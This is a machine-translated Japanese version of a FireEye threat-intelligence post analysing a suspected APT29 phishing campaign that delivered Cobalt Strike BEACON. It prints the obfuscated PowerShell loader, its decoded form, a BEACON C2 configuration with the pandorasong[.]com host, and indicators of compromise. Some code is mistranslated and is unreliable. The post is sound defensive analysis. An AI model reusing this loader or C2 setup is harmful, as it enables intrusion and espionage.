それほど快適ではない: 疑わしい APT29 フィッシング キャンペーンの不快な調査

Decoy document content news

序章

  • FireEye デバイスは、シンクタンク、法執行機関、メディア、米軍、画像、運輸、製薬、国家政府、防衛請負など、複数の業界に対する侵入の試みを検出しました。
  • この試みには、Cobalt Strike Beacon を配信する悪意のある Windows ショートカットを含む zip ファイルへのリンクを含む、米国国務省からのものと思われるフィッシング メールが含まれていました。
  • 共有された技術成果物;戦術、技術、手順 (TTP);ターゲティングは、この活動を、APT29 であると疑われる以前に観察された活動に関連付けます。
  • APT29 は、最初の侵害から数時間以内にフィッシング インプラントから離れることで知られています。

2018 年 11 月 14 日、FireEye は複数の業界の 20 以上のクライアントで、新たな標的型フィッシング活動を検出しました。

(更新) このキャンペーンは、防衛、画像、法執行機関、地方自治体、メディア、軍事、製薬、シンクタンク、運輸、および複数の地域の米国公共部門の業界で、20 を超える FireEye のお客様を対象としています。

— FireEye (@FireEye) 2018 年 11 月 15 日

攻撃者は、病院の電子メール サーバーとコンサルティング会社の企業 Web サイトに侵入し、インフラストラクチャを使用してフィッシング メールを送信したようです。フィッシング メールは、米国国務省の広報担当者からの安全な通信のように見せかけ、別の国務省広報担当者の個人ドライブに見せかけたページにホストされ、正当な国務省のフォームをデコイ。この情報は、公開されているデータから入手できますが、国務省のネットワークがこのキャンペーンに関与したことを示すものはありません。攻撃者は、各フィッシング メールで固有のリンクを使用し、FireEye が確認したリンクを使用して、武器化された Windows ショートカット ファイルを含む ZIP アーカイブをダウンロードし、無害なおとり文書と Cobalt Strike Beacon バックドアの両方を起動し、攻撃者がカスタマイズして侵入させました。正当なネットワーク トラフィックで。

フィッシング メールとネットワーク インフラストラクチャに投資されたリソース、兵器化されたショートカット ファイル ペイロードのメタデータ、標的となった特定の被害者の個人と組織など、このキャンペーンのいくつかの要素は、2016 年 11 月に最後に観測された APT29 フィッシング キャンペーンに直接関連しています。このブログ投稿では、これらの技術的なブレッドクラムと、このアクティビティの考えられる意図について説明します。

アトリビューションの課題

多くの場合、FireEye の最終的な帰属は、Mandiant のコンサルティング チームによる侵害された組織でのインシデントの調査を通じて得られ、被害者での攻撃および侵害後の活動の詳細を特定します。 FireEye は現在もこのアクティビティを分析しています。

2018 年 11 月 14 日のフィッシング キャンペーンと 2016 年 11 月 9 日の疑わしい APT29 フィッシング キャンペーンの間には、いくつかの類似点と技術的な重複があり、どちらも米国の選挙直後に発生しました。ただし、新しいキャンペーンには、創造的な新しい要素が含まれているだけでなく、同じシステムを使用して Windows ショートカット (LNK) ファイルを兵器化するなど、古いフィッシングの戦術、手法、および手順 (TTP) を意図的に再利用しているように見えます。 APT29 は洗練された攻撃者であり、洗練された攻撃者が絶対確実というわけではありませんが、ロシアの諜報機関による欺瞞の歴史的な使用法を考えると、一見露骨な間違いに思われるため、一時停止する必要があります。また、APT29 の活動を最終的に特定してから 1 年以上が経過しましたが、これは、このような長い幕間の後の活動のタイミングと類似性について疑問を投げかけています。

このキャンペーンと 2016 年のキャンペーンの注目すべき類似点には、Windows ショートカット メタデータ、標的となった組織と特定の個人、フィッシング メールの作成、侵害されたインフラストラクチャの使用が含まれます。注目すべき違いには、カスタム マルウェアではなく Cobalt Strike の使用が含まれます。ただし、多くのスパイ アクターは、もっともらしい否認などの理由で、公開されている市販のフレームワークを使用しています。

フィッシング キャンペーン中に、マルウェアをホストしているサイトが選択的にペイロードを提供している兆候がありました。たとえば、不正な HTTP ヘッダーを使用したリクエストは、公に入手可能な無害な国務省のフォームのみを含む ZIP アーカイブを提供したと報告されています。アクセスしたリンクに応じて、攻撃者が追加の異なるペイロードを提供した可能性があります。ただし、FireEye が観測したのは、無害な亜種と Cobalt Strike の亜種の 2 つだけです。

これについては、活動概要で詳しく説明します。キャンペーンの分析は進行中であり、コミュニティからの追加情報を歓迎します。

活動概要

脅威アクターは、公式文書を共有する米国国務省広報担当者になりすますために、フィッシング メールを作成しました。このリンクは、侵害された可能性のある正当なドメイン jmj[.].com でホストされている武器化された Windows ショートカット ファイルを含む ZIP アーカイブにつながっていました。ショートカット ファイルは、ショートカット ファイル内から追加のコードを読み取り、デコードし、実行する PowerShell コマンドを実行するように細工されています。

実行されると、ショートカット ファイルは無害で公開されている米国国務省のフォームと Cobalt Strike Beacon をドロップしました。 Cobalt Strike は、商用利用可能なポストエクスプロイト フレームワークです。 BEACON ペイロードは、公開されている「Pandora」Malleable C2 プロファイルの修正版で構成され、Pandora 音楽ストリーミング サービスのなりすましであると評価されたコマンド アンド コントロール (C2) ドメイン (pandorasong[.]com) を使用していました。 C2 プロファイルのカスタマイズは、デフォルト設定に依存する回復力の低いネットワーク検出方法を無効にすることを目的としている可能性があります。ショートカットのメタデータは、2016 年 11 月のキャンペーンで使用されたショートカットと同じ、または非常に類似したシステム上に構築されたことを示しています。おとりの内容を図 1 に示します。

Decoy document content
図 1: おとり文書の内容

古いアクティビティとの類似点

この活動には TTP があり、APT29 であると疑われる以前の活動と標的が重複しています。最近のスピアフィッシング キャンペーンで使用された悪意のある LNK、 ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c) は、2016 年 11 月の疑わしい APT29 LNK と技術的に重複しています。37486-the-shocking-truth-about-election-rigging-in-america.rtf .lnk (MD5: f713d5df826c6051e65f995e57d6817d)、これはVolexityによって公式に報告されました。 2018 と 2016 の LNK ファイルは、構造とコードが類似しており、LNK が作成されたシステムの MAC アドレスなど、メタデータが大幅に重複しています。

これらの LNK ファイルの配布に関与したフィッシング キャンペーンで採用されたターゲティングと戦術には、さらに重複が見られました。以前の APT29 の活動は、この電子メール キャンペーンと同じ受信者の一部を標的にしており、APT29 は以前のキャンペーンで大量の電子メールを利用していました。

展望と影響

この活動の分析は進行中ですが、APT29 の帰属が強化された場合、この洗練されたグループから少なくとも 1 年で発見された最初の活動となります。標的が広範囲に及んでいることを考えると、以前に APT29 の標的にされたことがある組織は、この活動に注意する必要があります。ネットワーク防御者にとって、この活動が APT29 によって行われたかどうかは、侵入の全範囲を適切に調査することの二次的なものである必要があります。これは、とらえどころのない欺瞞的な APT29 オペレーターが実際に環境にアクセスした場合に非常に重要です.

技術的な詳細

フィッシング

電子メールはDOSOneDriveNotifications-svCT-Mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[.]orgから送信されました。電子メールの配布は、影響を受けた組織間で大きく異なりました。ほとんどの対象の FireEye 顧客は 3 通以下の電子メールを受け取りましたが、1 人の顧客は 136 通を受け取り、それよりもはるかに多い数の電子メールを受け取った人もいました。

各フィッシング メールには、被害者のクリックを追跡するための、一意の悪意のある URL が含まれていました。この URL のパターンを図 2 に示します。

悪意のある URL 構造
図 2: 悪意のある URL の構造

一部の受信者の電子メール クライアントでは切り詰められている可能性がある送信者の電子メール アドレスの長さを除けば、攻撃者は、実際には国務省から送信されたものではないことを含め、電子メールの真の送信元を隠す努力をほとんどしていませんでした。図 3 は、フィッシング メッセージから編集された電子メール ヘッダーのスナップショットを示しています。

メールヘッダーの編集
図 3: 編集された電子メール ヘッダー

悪意のあるリンクは、ファイルds7002.zipの 2 つの亜種を提供したことが知られています。最初の亜種 (MD5: 3fccf531ff0ae6fedd7c586774b17a2d) にはds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c) が含まれていました。 ds7002.lnkは、埋め込まれた BEACON DLL とおとり PDF を含む悪意のあるショートカット (LNK) ファイルであり、PowerShell コマンドを起動するように細工されていました。実行時に、PowerShell コマンドは Cobalt Strike BEACON バックドアとデコイ PDF を抽出して実行しました。確認された ds7002.zip の別の亜種 (MD5: 658c6fe38f95995fa8dc8f6cfe41df7b) には、良性のおとりドキュメントのみが含まれていました。おとり文書ds7002.pdf (MD5: 313f4808aa2a2073005d219bc68971cd) は、hxxps://eforms.state.gov/Forms/ds7002.PDF からダウンロードされたようです。

BEACON バックドアは、C2 ドメインpandorasong[.]com (95.216.59[.]92)と通信しました。このドメインはプライバシー保護を活用していましたが、 vleger@tutanota.comを含む SOA (Start of Authority) レコードがありました。

私たちの分析は、攻撃者が攻撃の約 30 日前にインフラストラクチャの構成を開始したことを示しています。これは、私たちが追跡している他の多くの攻撃者よりも大幅に長い遅延です。表 1 に、この活動のタイムラインを示します。

時間

イベント

ソース

2018-10-15 15:35:19Z

pandorasong[.]com 登録済み

登録者情報

2018-10-15 17:39:00Z

pandorasong[.]com SSL証明書の確立

証明書の透明性

2018-10-15 18:52:06Z

Cobalt Strike サーバーが確立されました

スキャンデータ

2018-11-02 10:25:58Z

LNK兵器化

LNK メタデータ

2018-11-13 17:58:41Z

3fccf531ff0ae6fedd7c586774b17a2d 修正済み

アーカイブ メタデータ

2018-11-14 01:48:34Z

658c6fe38f95995fa8dc8f6cfe41df7b 変更

アーカイブ メタデータ

2018-11-14 08:23:10Z

最初に確認されたフィッシング メールの送信

テレメトリー

表 1: 運用スケジュール

実行

悪意のある LNK、 ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c) の実行時に、次の PowerShell コマンドが実行されました。

WindowsSystem32WindowsPowerShellv1.0powershell.exe -noni -ep bypass
$zk=’JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5
rijtpZiaoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPudldC1DaGlsZel0ZW0gLVBhdGggJE
Vudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W
0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlyY3RvcnkoJG9lkRpcmVjdG9yeU5hbWUp
O30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlyW0gJHRiLCdPcGVuJywnUmVhZCcsJ
1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2en
ZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZC
gkb2UMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFy
cmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJL
kdldFN0cmluZygkb2UpO2lleCAkems7′;$fz=’FromBase’+0x40+’String’;$rhia=[Text.E
ncoding]::ASCII.GetString([変換]::$fz.Invoke($zk));iex $rhia;

このコマンドには特定の難読化が含まれており、特定の検出ロジックをバイパスしようとしている可能性があります。たとえば、Base64 のデコードに使用される PowerShell コマンドである FromBase64String の代わりに‘FromBase’+0x40+’String’を使用します。

デコードされたコマンドは、オフセット0x5e2beからオフセット0x623b6までのds7002.lnkのコンテンツを読み取る追加の PowerShell で構成され、base64 は抽出されたコンテンツをデコードし、追加の PowerShell コンテンツとして実行しました。埋め込まれた PowerShell コードは次のようにデコードされます。

$ptgt=0x0005e2be;
$vcq=0x000623b6;
$tb=”ds7002.lnk”;
if (-not(Test-Path $tb))
{
$oe=Get-ChildItem -Path $Env:temp -Filter $tb -Recurse;
if (-not $oe)
{
出口
}
[IO.Directory]::SetCurrentDirectory($oe.DirectoryName);
}
$vzvi=New-Object IO.FileStream $tb,’Open’,’Read’,’ReadWrite’;
$oe=新しいオブジェクト バイト[]($vcq-$ptgt);
$r=$vzvi.Seek($ptgt,[IO.SeekOrigin]::Begin);
$r=$vzvi.Read($oe,0,$vcq-$ptgt);
$oe=[変換]::FromBase64CharArray($oe,0,$oe.Length);
$zk=[Text.Encoding]::ASCII.GetString($oe);
iex $zk;

デコードされた PowerShell を 2016 年の古い PowerShell 組み込みローダーと比較すると (図 4)、類似点がまだ存在することは明らかです。ただし、新しいアクティビティは、スクリプトに含まれる文字列を難読化するだけでなく、ランダム化された変数名と関数名を利用します。

古いアクティビティでロードするための共有関数 (XOR デコード関数と CopyFilePart)
図 4: 古いアクティビティのローダーへの共有関数 (XOR デコード関数と CopyFilePart)

PowerShell ローダー コードは難読化されていますが、難読化を解除した短いスニペットを以下に示します。おとり PDF および BEACON ローダー DLL は、LNK 内の特定のオフセットから読み取られ、デコードされ、その内容が実行されます。 BEACON ローダー DLL は、エクスポート関数「PointFunctionCall」で実行されます。

[省略]
$jzffhy = [IO.FileAccess]::READ
$gibisec = myayxvj $(“ds7002.lnk”)
$oufgke = 0x48bd8
$wabxu = 0x5e2be – $oufgke
$lblij = bygtqi $gibisec $oufgke $wabxu $(“%TEMP%ds7002.PDF”) Invoke-Item
$((lylyvve @((7,(30 + 0x34 – 3),65,(84 – 5),(-38 + 112),(-16 + 0x25 + 52))) 35))
$oufgke = 0x0dd8
$wabxu = 0x48bd8 – $oufgke
$yhcgpw = bygtqi $gibisec $oufgke $wabxu $(“%LOCALAPPDATA%cyzfc.dat”) の場合
($ENV:PROCESSOR_ARCHITECTURE -eq $(“AMD64”)) { & ($(“rundll32.exe”)) $(“,”)
$(“PointFunctionCall”) }

ドロップされたファイル

LNK ファイルの実行に成功すると、次のファイルが被害者のシステムにドロップされます。

  • %APPDATA%Localcyzfc.dat (MD5: 16bbc967a8b6a365871a05c74a4f345b)
    • BEACON ローダ DLL
  • %TEMP%ds7002.PDF (MD5: 313f4808aa2a2073005d219bc68971cd)
    • おとり文書

ドロップされた BEACON ローダー DLL は、エクスポート関数「PointFunctionCall」を使用して RunDll32.exe によって実行されました。

「C:Windowssystem32rundll32.exe」
C:UsersAdministratorAppDataLocalcyzfc.dat, PointFunctionCall

BEACON ペイロードには、次の構成が含まれていました。

認可 ID: 0x311168c
dns_スリープ: 0
http_headers_c2_post_req:
承認: */*
コンテンツ タイプ: テキスト/xml
X-Requested-With: XMLHttpRequest
ホスト: pandorasong.com
http_headers_c2_request:
承認: */*
GetContentFeatures.DLNA.ORG: 1
ホスト: pandorasong[.]com
クッキー: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
ジッター: 17
named_pipes: \%spipemsagent_%x
process_inject_targets:
%windir%syswow64rundll32.exe
%windir%sysnativerundll32.exe
beacon_interval: 300
c2:
接続タイプ: SSL
ホスト: pandorasong[.]com
ポート: 443
c2_url:
パンドラソング[.]com/radio/xmlrpc/v45
pandorasong[.]com/access/
c2_user_agents: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) のような Gecko

ネットワーク通信

マルウェアのインストール/初期化に成功した後、TCP/443 SSL 経由で C2 サーバー pandorasong[.]com に次のコールバックを行いました。このサンプルは、ネットワーク通信に柔軟な C2 プロファイルを使用するように構成されていました。使用されている特定のプロファイルは、 公開されている Pandora C2 プロファイルの修正版のようです。プロファイルは、公開されている可鍛性プロファイルの一般的な検出をバイパスするように変更されている可能性があります。以下は、GET 要求のサンプルです。

GET /access/?version=4&lid=1582502724&token=ajlomeomnmeapoagcknffjaehikhmpep
Bdhmoefmcnoiohgkkaabfoncfninglnlbmnaahmhjjfnopdapdaholmanofaoodkiokobenhjd
Mjcmoagoimbahnlbdelchkffojeobfmnemdcoibocjgnjdkkbfeinlbnflaeiplendldlbhnhjmbg
agigjniphmemcbhmaibmfibjekfcimjlhnlamhicakfmcpljaeljhcpbmgblgnappmkpbcko
HTTP/1.1
承認: */*
GetContentFeatures.DLNA.ORG: 1
ホスト: pandorasong.com
クッキー: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
ユーザーエージェント: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) のような
ヤモリ
接続: キープアライブ
キャッシュ制御: キャッシュなし

古いアクティビティとの類似点

図 5 と図 6 は、最近のスピア フィッシング メールds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c) で使用された LNK と、SPIKERUSH バックドア37486-theにつながった 2016 年 11 月の攻撃で疑われる APT29 LNK との重複する特徴を示しています。 -shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d)。

LNK の特徴: 新しいアクティビティ (左) と古いアクティビティ (右)
図 5: LNK の特徴: 新しいアクティビティ (左) と古いアクティビティ (右)
LNK の特徴: 新しいアクティビティ (左) と古いアクティビティ (右)
図 6: LNK の特徴: 新しいアクティビティ (左) と古いアクティビティ (右)

同様の LNK 特性に加えて、PowerShell コマンドは、SPIKERUSH バックドアを実行した古いサンプルのコードと非常によく似ています。図 7 と図 8 に示すように、同じ変数名の一部はこの新しいバージョンでも保持されています。

埋め込まれた PowerShell: 新しいアクティビティ (左) と古いアクティビティ (右)
図 7: 埋め込まれた PowerShell: 新しいアクティビティ (左) と古いアクティビティ (右)
共有文字列難読化ロジック: 新しい LNK アクティビティ (左) と古い VERNALDROP アクティビティ (右)
図 8: 共有文字列難読化ロジック: 新しい LNK アクティビティ (左) と古い VERNALDROP アクティビティ (右)

指標

インジケータ

説明

dosonedrivennotifications-svct-mailboxe36625aaa85747214aa50342836a2315aaa36
928202aa46271691a8255aaa15382822aa25821925a
0245@northshorehealthgm[.]org

侵害された可能性のある正当なサーバーからのフィッシング メール アドレス

Stevenson, Susan N は「TP18-DS7002 (UNCLASSIFIED)」をあなたと共有しました

フィッシング メールの件名

https://www.jmj[.]com/personal/nauerthn_state_gov/*

侵害された可能性のある正当なドメイン上のマルウェアのホスト場所

パンドラソング[.]com

ビーコン C2

95.216.59[.]92

pandorasong[.]comの解像度

2b13b244aafe1ecace61ea1119a1b2ee

pandorasong[.]com の SSL 証明書

3fccf531ff0ae6fedd7c586774b17a2d

悪意のある ZIP アーカイブ MD5

658c6fe38f95995fa8dc8f6cfe41df7b

無害な ZIP アーカイブ MD5

6ed0020b0851fb71d5b0076f4ee95f3c

悪意のある LNK ファイル MD5

313f4808aa2a2073005d219bc68971cd

良性のおとり PDF MD5

16bbc967a8b6a365871a05c74a4f345b

ビーコン DLL MD5

%APPDATA%Localcyzfc.dat

BEACON DLL ファイルのパス

%TEMP%ds7002.PDF

無害なおとり PDF ファイル パス

表 2: 指標

関連サンプル

37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d)

ファイアアイ検出

FireEye は、プラットフォーム全体でこのアクティビティを検出しました。表 3 には、このアクティビティに適用された特定の検出名が含まれています。

製品

検出名

ネットワークセキュリティー

Malware.Archive
Malware.Binary.lnk
疑わしい.バックドア.ビーコン

エンドポイント セキュリティ

疑わしい PowerShell の使用法 (方法論)
Generic.mg.16bbc967a8b6a365

脅威分析プラットフォーム

WINDOWS METHODOLOGY [PowerShell Base64 文字列]
Windows の方法論 [Rundll32 ローミング]
WINDOWS METHODOLOGY [PowerShell スクリプト ブロックの警告]
WINDOWS METHODOLOGY [Base64 Char Args]
TADPOLE DOWNLOADER [Rundll Args]
INTEL HIT – IP [構造化された脅威評価ベース]
INTEL HIT – FQDN [構造化された脅威評価ベース] [DNS]
INTEL HIT – FQDN [構造化された脅威評価ベース] [非 DNS]
INTEL HIT – FILE HASH [構造化された脅威評価ベース]

表 3: FireEye 製品の検出

参照: https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign

Comments

タイトルとURLをコピーしました